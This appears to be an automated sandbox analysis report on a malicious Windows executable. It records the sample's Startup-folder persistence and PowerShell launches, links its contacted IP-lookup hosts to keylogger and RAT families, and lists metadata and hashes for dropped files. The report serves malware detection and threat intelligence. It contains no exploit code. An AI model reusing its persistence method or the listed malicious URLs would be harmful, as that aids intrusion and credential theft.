                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:21
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:upXUt2jZ0S.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:d53a9888b375983c277dc4471f3f37e258cca57a1e242784c4130b928127c254.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.spre.troj.adwa.evad.winEXE@19/16@3/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 33.3%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 132
                                                                      • Number of non-executed functions: 3
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.89.179.12, 13.107.246.45, 4.245.163.56, 40.126.32.138, 52.165.164.15, 20.109.210.53
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                      • Execution Graph export aborted for target .exe, PID 7624 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 3964 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7504 because it is empty
                                                                      • Execution Graph export aborted for target upXUt2jZ0S.exe, PID 1184 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                      TimeTypeDescription
                                                                      15:55:44API Interceptor80x Sleep call for process: upXUt2jZ0S.exe modified
                                                                      15:55:46API Interceptor2x Sleep call for process: svchost.exe modified
                                                                      15:55:46API Interceptor7x Sleep call for process: powershell.exe modified
                                                                      15:56:01API Interceptor1x Sleep call for process: .exe modified
                                                                      15:56:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                      20:55:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.48.1NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                      • www.axis138ae.shop/j2vs/
                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                      • twirpx.org/administrator/index.php
                                                                      SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                      • www.antipromil.site/7ykh/
                                                                      132.226.247.732CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      s-part-0017.t-0009.t-msedge.net247714231173424547.jsGet hashmaliciousStrela DownloaderBrowse
                                                                      • 13.107.246.45
                                                                      984279432356016169.jsGet hashmaliciousStrela DownloaderBrowse
                                                                      • 13.107.246.45
                                                                      https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                      • 13.107.246.45
                                                                      I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.107.246.45
                                                                      295963673155714664.jsGet hashmaliciousStrela DownloaderBrowse
                                                                      • 13.107.246.45
                                                                      24928193762733825739.jsGet hashmaliciousStrela DownloaderBrowse
                                                                      • 13.107.246.45
                                                                      FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                      • 13.107.246.45
                                                                      http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                      • 13.107.246.45
                                                                      Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                      • 13.107.246.45
                                                                      AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.107.246.45
                                                                      checkip.dyndns.com2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.247.73
                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.247.73
                                                                      SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 158.101.44.242
                                                                      oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 132.226.247.73
                                                                      FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 193.122.6.168
                                                                      4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 158.101.44.242
                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 193.122.6.168
                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 193.122.6.168
                                                                      reallyfreegeoip.org2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.16.1
                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.64.1
                                                                      oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.32.1
                                                                      v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.64.1
                                                                      4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.112.1
                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 104.21.48.1
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSjG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.13.205
                                                                      2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.16.1
                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.64.1
                                                                      oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.97.3
                                                                      FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.32.1
                                                                      v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.64.1
                                                                      HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.13.205
                                                                      UTMEMUS2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.247.73
                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.247.73
                                                                      oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 132.226.247.73
                                                                      FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.247.73
                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 132.226.8.169
                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      54328bd36c14bd82ddaa0c04b25ed9ad2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.21.48.1
                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 104.21.48.1
                                                                      No context
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.49320858179212973
                                                                      Encrypted:false
                                                                      SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztan:cJhXC9lHmutpJyiRDeJ/aUKrDgnmJ
                                                                      MD5:3470EB01E2E31041BFA8A642BA17A5AF
                                                                      SHA1:E7D599F0FD8DDC7058B29154F1DDF630B38148C2
                                                                      SHA-256:CE4619A5EFC06BD36C2A7CE53703C97C5B743D94BF8A4F981D0E68AFCC0C3FCB
                                                                      SHA-512:7C25EF97176E41B64DD336D3513C99FA562FE97E42ABEAB7217589EB565462F38037CEB94E1BE93DD32ADE1FE934B0F6B93106918331A4A1A6B520D54F513F58
                                                                      Malicious:false
                                                                      Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf3fc2108, page size 16384, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.7216983381064119
                                                                      Encrypted:false
                                                                      SSDEEP:1536:rSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:razaNvFv8V2UW/DLzN/w4wZi
                                                                      MD5:FBDCA77CB82E9069881C2A35B84B7611
                                                                      SHA1:217813CD5D7C986C5FF90B8E5F2EB91C23999256
                                                                      SHA-256:9CCE830E986ED49FEBBDB2378CFD99856F09E48B55DB5C2DD2376841EBEC8217
                                                                      SHA-512:64034854BA92C6964A5F5AA992F509FF53B295D2351AD791998314C81428AAFEE8D7F41C04B5708E01747BB6568226FC1484068D54828EC6D93AAA5A17B21E62
                                                                      Malicious:false
                                                                      Preview:..!.... ...............X\...;...{......................p.D..........{}..7...}..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{.....................................t.7...}......................7...}...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.08096791731506894
                                                                      Encrypted:false
                                                                      SSDEEP:3:N2llKYe8iWO/fgsCrZClW/tRLiWjloll+SHY/Xl+/rQLve:Y/KzO+fgs3GvL1CAS4M
                                                                      MD5:D3BC5DE48DA2AD1DE02F2FDABAA02C72
                                                                      SHA1:9ED0FF1871094577A46DEEA603F338913E181879
                                                                      SHA-256:35B8B71C09394FC7DB76C972E8325BA78C01934455534A3CE228B93F422686A0
                                                                      SHA-512:642D5B9B715D172C6AE43F478086825EA876B8FEF38DC7CFF09506F5B9BDE453A3270168DE98B59B1A74EB3ABC02D407E6F9B1EDDDF2F85EE69F5DA00BF539CF
                                                                      Malicious:false
                                                                      Preview:2........................................;...{...7...}.......{}..............{}......{}.vv_Q.....{}.....................7...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):1.0950866094737384
                                                                      Encrypted:false
                                                                      SSDEEP:192:q3joSaI0T0BU/HbGa6ce36izuiFCZ24IO8Q3g:kjoSaI0ABU/6arVizuiFCY4IO8Qw
                                                                      MD5:F63C0C566C19CC7FF005D5CD658E8767
                                                                      SHA1:71BFF0EB45EB1119DA850EE75B0EA2D38FB3527F
                                                                      SHA-256:5ABA8A576C782E37557E549F3E143C967B2CB4F8886EC82E2517793F2F25905A
                                                                      SHA-512:63D4BE344AE9E1EDD6009B2780ECCCB81D456F744227AFC89E518AB0D27B3C283B50E974B55F43545562B12F872CB0375B556B8DF814790E1C823B0D2DA9E458
                                                                      Malicious:false
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.1.6.1.6.7.7.3.0.0.5.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.1.6.1.6.8.5.4.2.5.4.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.4.1.2.1.5.d.-.8.4.8.b.-.4.d.3.c.-.a.4.0.a.-.a.0.d.2.2.4.5.2.5.0.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.7.d.4.3.d.a.-.d.c.e.c.-.4.6.3.e.-.a.e.b.0.-.2.2.a.0.5.3.c.5.e.a.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.n.o.c.h.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.8.-.0.0.0.1.-.0.0.1.4.-.3.a.6.7.-.3.1.0.f.a.2.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.1.7.5.8.0.2.8.9.e.c.f.b.2.6.f.1.8.b.f.6.9.0.1.4.4.5.5.a.9.3.8.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.c.4.1.5.a.5.8.d.a.e.5.2.f.8.2.b.e.f.c.0.d.a.f.d.9.4.7.d.5.1.9.a.4.b.1.5.7.4.!...e.x.e...
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Jan 10 20:56:08 2025, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):270634
                                                                      Entropy (8bit):3.716225568089184
                                                                      Encrypted:false
                                                                      SSDEEP:3072:HvnBuEacuUNhwP8Tt0nNMWc4uEqSyU6D/LTgx9AYAx86Mp:HvnBuEa9faWc4/ynXTgx9AW
                                                                      MD5:54F39FE7FAA14C762EC5FC905E52BEF5
                                                                      SHA1:CF84E516FFF17BBAAFBCB16CB90539B85B3CE2F5
                                                                      SHA-256:23958E42D6560E9CE4938C847179EBE63787E5165230D9879CC6DAF3D9C25AAF
                                                                      SHA-512:5B9E8055AB9F939FA82AB575E7479F67AE7AB3201DD70D87D388EC0957D79ECE7BE614EC384119A49CECDA52B8970178989430D904E93347E58725038C1567DA
                                                                      Malicious:false
                                                                      Preview:MDMP..a..... .......h..g............D...............X.......<....#......4%...R..........`.......8...........T............<..............,$...........&..............................................................................eJ.......&......GenuineIntel............T...........b..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8264
                                                                      Entropy (8bit):3.692532079870383
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJeF6wp6Y/M6m1gmf540mprr89bmUsfDim:R6lXJs6E6YU6Ugmf540/mHfn
                                                                      MD5:AEB3597132E9F4131444CDF337DFF188
                                                                      SHA1:C3D8B7C8DD5C02648403B729843F7A2FA1BEB1AE
                                                                      SHA-256:B7FA1FD8395DBD0FEA0DE6F7224C45671C7D5B9A1954013BE4AF38D051B1280B
                                                                      SHA-512:C75674AE9C751396EE2C484A0AEB173D280D3260012341176A4117BD5FB88CFB7DF0568DA0D812DF905E83DD93B444ECC63D459AA438DDFA00C1F27EC959AE19
                                                                      Malicious:false
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.2.4.<./.P.i.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4607
                                                                      Entropy (8bit):4.4480518940622575
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zslJg77aI9WiwWpW8VYFYm8M4JPjFxO+q8T4XPlJ0Rd:uIjf/I7RJ7VxJLOXXPwRd
                                                                      MD5:88983681B3A6BA37C0FCF8E9770D13A3
                                                                      SHA1:56626C6721683BFBBE3A90332E6B38C50FDE93D0
                                                                      SHA-256:F3BB6C3D79489B5F4D9BC1710795C4CC86E5F16FB98BFBB5909158334A0A744B
                                                                      SHA-512:31F19B1920BC50E60E6F6A648503617F3CEC56B5BA8688B158F8FF54FDE455688A01F578EF25176E7D15D4F4538EFBD6BB6BB2A3B13EA345135F16DF42D67076
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670318" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                      Process:C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1039
                                                                      Entropy (8bit):5.353332853270839
                                                                      Encrypted:false
                                                                      SSDEEP:24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
                                                                      MD5:A4AF0F36EC4E0C69DC0F860C891E8BBE
                                                                      SHA1:28DD81A1EDDF71CBCBF86DA986E047279EF097CD
                                                                      SHA-256:B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
                                                                      SHA-512:A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
                                                                      Malicious:true
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1248
                                                                      Entropy (8bit):5.370777891441471
                                                                      Encrypted:false
                                                                      SSDEEP:24:3vQWWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R8UHrx:YWWSU4y4RQmFoUeWmfmZ9tlNWR8Wt
                                                                      MD5:93C80849E27DDE20CCB9753F5E77CFEF
                                                                      SHA1:D804D9BDD6F298E64F1CF6FD9CB6B4B47BB93C48
                                                                      SHA-256:A0DD3BB5A627248AC2FCBF8BB234C769E5D33230B92DE9FCD1AB6E39AE4815F1
                                                                      SHA-512:250FBCD5905FF70E5CB723E6CF23CF19F7C64F55D7F22A05A54248F34E07A4C825680C0C905FF45DF60998CB7DA84B3E5342B105EEF613EBBCA569F03B63B84E
                                                                      Malicious:false
                                                                      Preview:@...e.................................f..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
